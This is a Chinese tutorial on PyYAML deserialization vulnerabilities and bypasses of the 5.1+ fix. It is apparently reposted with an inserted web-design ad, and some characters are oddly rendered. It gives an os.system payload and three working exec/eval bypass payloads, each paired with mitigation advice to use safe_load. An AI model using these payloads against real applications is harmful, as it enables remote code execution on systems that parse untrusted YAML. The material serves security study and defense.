這篇文章將為大家詳細(xì)講解有關(guān)PyYAML反序列化防御和ByPass是怎么樣的，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個(gè)參考，希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。

網(wǎng)站建設(shè)哪家好，找創(chuàng)新互聯(lián)建站！專注于網(wǎng)頁設(shè)計(jì)、網(wǎng)站建設(shè)、微信開發(fā)、微信小程序開發(fā)、集團(tuán)企業(yè)網(wǎng)站建設(shè)等服務(wù)項(xiàng)目。為回饋新老客戶創(chuàng)新互聯(lián)還提供了瀍河免費(fèi)建站歡迎大家使用！

PyYAML介紹

PyYAML是Python出眾的模塊之一。PyYAML就是python的一個(gè)yaml庫yaml格式的語言都會(huì)有自己的實(shí)現(xiàn)來進(jìn)行yaml格式的解析（讀取和保存）。若對(duì)于Python反序列化有所了解一定會(huì)聽說過它。

PyYAML歷史漏洞和修復(fù)

它的反序列化漏洞使得大多數(shù)Python安全研究人員對(duì)齊記憶猶新。

當(dāng)咱們使用反序列化時(shí)候會(huì)使用如下的載荷：

!!python/object/new:os.system ["whoami"]

并且使用load()進(jìn)行加載時(shí)PyYAML將會(huì)執(zhí)行os.system("whoami")。這樣會(huì)導(dǎo)致命令執(zhí)行，從而輸出用戶名。

該漏洞在5.1+版本之中得到修復(fù)，如果依然使用歷史漏洞載荷，將會(huì)得到錯(cuò)誤提示的告警。

while constructing a Python instance
expected a class, but found 
  in "", line 1, column 1:
    !!python/object/new:os.system [" ... 
    ^

這樣因?yàn)橹荒芊葱蛄谢糠只绢愋停瑯O大程度上緩解了反序列化漏洞帶來的影響。

PyYAML ByPass

當(dāng)咱們回看部分基本類型時(shí)，將會(huì)注意到Python內(nèi)置方法exec、eval。在手冊(cè)之中有這樣一段描述。

exec 執(zhí)行儲(chǔ)存在字符串或文件中的Python語句，相比于 eval，exec可以執(zhí)行更復(fù)雜的 Python 代碼。

如此能夠得到ByPass載荷。

PayLoad1:

import yaml

payload = """
- !!python/object/new:str
    args: []
    state: !!python/tuple
    - "print('漏洞存在')"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec
"""
yaml.load(payload)

回顯：
->漏洞存在

PayLoad2:

import yaml

payload = """
!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "print('漏洞存在')"
"""
yaml.load(payload)

回顯：
->漏洞存在

PayLoad3:

import yaml

payload = """
!!python/object/new:tuple 
- !!python/object/new:map 
  - !!python/name:eval
  - [ print('漏洞存在') ]
"""
yaml.load(payload)

回顯：
->漏洞存在

這三種載荷均是利用基本類型之中代碼執(zhí)行函數(shù)，從而繞過5.1+的防御措施。

修復(fù)方法

1、按照官方推薦使用safe_load對(duì)于序列化內(nèi)容進(jìn)行加載。

2、檢測加載文件頭防止加載代碼執(zhí)行函數(shù)。

關(guān)于PyYAML反序列化防御和ByPass是怎么樣的就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，可以學(xué)到更多知識(shí)。如果覺得文章不錯(cuò)，可以把它分享出去讓更多的人看到。